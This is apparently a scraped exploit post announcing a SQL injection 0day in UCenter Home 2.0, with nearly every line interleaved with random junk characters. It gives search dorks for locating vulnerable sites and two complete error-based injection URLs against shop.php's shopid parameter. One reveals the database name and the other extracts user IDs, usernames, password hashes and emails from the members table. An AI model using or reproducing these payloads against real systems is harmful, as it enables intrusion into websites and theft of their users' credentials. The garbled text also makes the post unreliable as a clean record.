7 q, l1 C" ]1 V, }7 ~4 e
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 4 u( s: r# Y: U
: V$ `: E: N7 ^ I y# Q/ C$ v. W
& y5 I, j( G! ~' y1 n' ^
- t1 V( g8 B3 v* T% C*/ Author : KnocKout
% ^# z z& j) y/ I2 w8 Q& y
/ V' w! Y# y+ k*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers / @3 g" l8 e1 l/ {/ p
& W$ Z- o" i7 g*/ Contact: knockoutr@msn.com
. y7 Z% U6 D1 V9 ]7 q7 O( E/ j- p7 N% Z1 L3 Z# M1 A4 O
*/ Cyber-Warrior.org/CWKnocKout 5 j0 c& r4 q9 E! e' ~6 I# H; J8 H6 E
2 `# o' y1 ~& |2 O l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
. v2 U2 N9 z4 b6 g. ]2 l" j$ b) S# I0 i' ~" C! a( ]
Script : UCenter Home
a b, k+ G, J. M( ]" z5 ?/ j% c' [2 U( K
Version : 2.0 7 ]% L5 Q+ a# W# w+ X1 F3 H
) N( t \/ N- v8 @4 OScript HomePage : http://u.discuz.net/ 0 D7 z+ i6 F* }+ t( D c. D
) a+ `) X& m s0 R
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== . @. o7 [ I# t0 y& N2 F6 z
& w. z, _2 L S" `( o7 S
Dork : Powered by UCenter inurl:shop.php?ac=view
) |, u. W# l6 I2 _9 X0 r
* v! z$ I7 q! ?6 ^, t: H% xDork 2 : inurl:shop.php?ac=view&shopid= 2 `6 p; d5 _# }7 m/ B7 ]
+ H n4 g7 [ ?& a% f9 d__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : [& M# |( S' ]; u7 [# X
% P8 m, F. h! h+ V5 j/ \
Vuln file : Shop.php , C4 F1 ]! E L/ C4 i
. j/ e& T& ^$ V" t H3 R5 zvalue's : (?)ac=view&shopid=
6 _7 L- J) V! C @. ?+ ~
$ A3 k, Y; i, }0 q' e" KVulnerable Style : SQL Injection (MySQL Error Based)
, R% a+ z# R! D0 C8 Y9 h9 r! c( i
Need Metarials : Hex Conversion
- B! L1 t* C- v* h) b0 |
0 u& A* [* [9 d* W. y8 ]( C__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + R" x% M8 N2 U
( w9 h+ \9 c) ~1 ~, g: y) X6 T/ y
Your Need victim Database name. 1 H5 i2 }7 h2 P6 C
: v e5 W6 Y2 m4 q
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # P" T$ R8 y$ A- o# f4 T9 X3 h8 l
7 \7 @$ d# h7 v..
/ K$ i' Z+ i( P+ O
+ ]" o* e) g( O3 x5 `DB : Okey. ! b j" E! ^) z) n2 P
, R& I* n7 n/ @. c: V( Myour edit DB `[TARGET DB NAME]` ( q6 v, @% g9 G' O/ o
- ? s) `( u. MExample : 'hiwir1_ucenter' " g, D* d# j8 }: U7 I9 C2 `2 d
" x2 F& t6 G+ HEdit : Okey.
- Q/ u+ {# c% B
- Q( v% P; E0 I( sYour use Hex conversion. And edit Your SQL Injection Exploit..
( X4 v, \& X3 q2 i- p/ p6 S( N4 a0 t) D5 s. R
$ b6 h% W3 G. v
6 _) \' d4 t) i h0 AExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ' J8 l) e; a" U* L
|